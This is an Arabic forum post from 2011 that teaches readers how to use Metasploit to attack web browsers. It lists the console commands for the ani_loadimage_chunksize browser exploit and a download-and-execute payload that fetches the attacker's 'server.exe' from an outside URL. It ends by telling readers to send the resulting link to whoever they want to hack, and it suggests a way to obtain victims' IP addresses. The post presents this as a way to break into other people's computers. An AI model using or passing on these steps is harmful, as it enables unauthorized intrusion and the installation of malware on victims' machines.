منتدى عالمنـــــــــا الأفضل
دخول

لقد نسيت كلمة السر

بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

المواضيع الأخيرة
تدفق ال RSS


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 


عدد الزوار

أنت الزائر رقم

 


شرح برنامج ميتاسبلويت ( m e a t sploit) واختراق ثغرات المتصفح ..!!

اذهب الى الأسفل

شرح برنامج ميتاسبلويت ( m e a t sploit) واختراق ثغرات المتصفح ..!!

مُساهمة من طرف ahmed في الثلاثاء ديسمبر 27, 2011 10:43 am

افتراضي شرح برنامج ميتاسبلويت ( m e a t sploit) واختراق ثغرات المتصفح ..!!

السلام عليكم ورحمة الله وبركاته

بسم الله نبدأ





:: ---نبذه--- ::

كما تعرفون اصبحت ثغرات المتصفح قليله في وقتنا الحالي ...
وصعوبة البحث من قبل الهكر ذو المستوى البسيط عن اكتشاف ثغرات جديده بنفسه ...
فقاموا بعمل مشروع يساعد المبرمجين (الهكر) ع اكتشاف الثغرات بجميع انواعها ...
من خلال هذا البرنامج سوف تصبح محترف بأذن الله ..



::--وظيفة البرنامج --::


البرنامج يقوم بجمع جميع الثغرات المنزله من قبل مواقع السيكورتي والمواقع الاخرى بطريقه مبسطه وسهولة التعرف ع نوع الثغره واشياء اخرى سوف نتطرق لها ...
البرنامج مزورد ببرامج تساعد لاأختراق المواقع مثل برنامج النت كات وبرنامج ترجمة ثغرات الروبي وغيرها (يعني عده كامله )


::-- طريقة استعمال البرنامج --::


اول حاجه في مسطلحات الي راح نستخدمها :-

:.:.:..اوامر الاستخدام :.:.:. Command



show <==== أعرض
set <==== أختار
use <==== استخدم
unset <==== تراجع
cmd <==== تنفيذ امر

--------------------------------------------------------------------


:.:.:.. اوامر خيارات الثغره :.:.:..

payload <==== هذا الامر مهم .. هذا البايلود وظعوه بالبرنامج يعطيك خيارات بالثغره يسألك يقولك س\ كيف تريد ان تتصل بالثغره وماذا تريد ان تعمل بها ..؟؟ عاد هو يعطيك خيارات كثار راح نشوفها بعد شوي ..


Options <==== هذا امر يعرض لك خيارات الثغره بعد التعديل ومواصفات الثغره والانظمه التي تشتغل عليها الثغره مثل ( xp , liunx ) ويختلف تمام عن الامر السابق لحد يلخبط


--------------------------------------------------------------------


:.:.:.. طريقة الاستعمال وكيفية الاختراق..:.:.:.:


قبل ما نبدأ حمل البرنامج

http://www.****sploit.com/framework/...mework-3.2.exe


طيب بعد ما تحمل البرنامج سويله تحديث (update) عشان تحمل عليه آخر الثغرات اللي نزلت





وبعد ما تسوي التحديث إفتح البرنامج

بدأ ====>> كافة البرامج =====>> ****sploit ====>> ا****sploit 3 ***


وانتظر بعدها وإظغط على console




وتجينا الواجه الي نطبق عليها الشرح









الآن أكتب الآمر التالي

show exploits



وحتجينا جميع الثغرات




ثغرات المتصفح تبدأ بـ---->> windows/browser

طيب انا حشرح اخر ثغرة نزلت اللي هيا ثغرة ani_loadimage_chunksize

اكتب الآمر التالي لإستخدامها

use windows/browser/ani_loadimage_chunksize

الآن نستخدم بايلود وقلنا ان البايلود وظيفته يسألك بعد ماتختار الثغره يقولك ماذا تريد ان تعمل في الثغره ..( يعني تبي تتصل فيها اتصال مباشر bind ولا اتصال عكسي reverseالخ....)
البرنامج فيه بايلودات كثيره نختار اللي يناسبنا

هذا امر من اوامر البايلود بشرحلكم وضيفته windows/download_exec

هذا امر لنظام وندوز يقوم بتحميل واستخراج صيغة exe وهو الي راح نستخدمه بالاختراق


اكتب الآمر التالي لعرض جميع البايلودات

show payloads




طيب الآن نسوي تجربه
ونستخدم بايلود لكتابة الآوامر
ونكتب فيه الآمر calc.exe
وهو آمر لتشغيل الآلة الحاسبة
ونجربه على نفسنا ونشوف هل الآلة الحاسبة تشتغل ؟
اذا كانت تشتغل يعني الثغرة شغالة 100%


اكتب الآوامر التالية

set payload windows/exec

هذا الآمر لإستخدام بايلود كتابة الآوامر

set cmd calc.exe

وهذا الآمر لجعله يشغل الآلة الحاسبة

نكتب بعد كذا امر لتحديد اي بي الشخص المستهدف وانت لازم تجيبه بأي طريقه ... استخدم سكربت ipget للماسنجر وغيرها طرق مانبي نتطرق للامر .... طبعا انت بالامر هذا بدا الاكس الموجود تحط الاي بي حقك عشان تجرب ع نفسك .. الثغره وتشوف هي شغاله ولا لا


set payloads SRVHOST xxx.xxx.xxx.xxx

واكتب exploit لبدأ الثغرة




مثل مانتو ملاحظين البرنامج اعطانا رابط

انسخ الرابط والصقه في المتصفح

وحتشتغل الآلة الحاسبة في جهازك




طيب هذا يعني الثغرة شغالة 100%


طيب الآن نغير البايلود ونستخدم بايلود لتنزيل الباتش

اكتب الآوامر التآلية

unset payload

وهو الآمر للتراجع عن استخدام البايلود

set payload windows/download_exec

آمر لإستخدام بايلود لتنزيل الباتش في جهاز الضحية

set url http://feezo.com/server.exe

مع استبدال رابط سيرفرك


واكتب exploit لبدأ الثغرة



مثل ما إنتو شايفين في الصورة البرنامج اعطانا رابط

الرابط هذا اعطيه للي تبي تخترق جهازه

وانتهينا

اتمنى يكون الشرح واضح

أتمنى التقييم
منقول










avatar
ahmed
مدير المنتدى
مدير المنتدى

عدد المساهمات عدد المساهمات : 109

الجنس الجنس : ذكر

العمر العمر : 28

الهواية الهواية : رياضة

المهنة المهنة : جامعى

مزاجى مزاجى : رايق

الدولة الدولة : مصر

الأوسمة الأوسمة : المدير العام

لاإله إلا أنت سبحانك إنى كنت من الظالمين


معاينة صفحة البيانات الشخصي للعضو http://3almona.alafdal.net

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى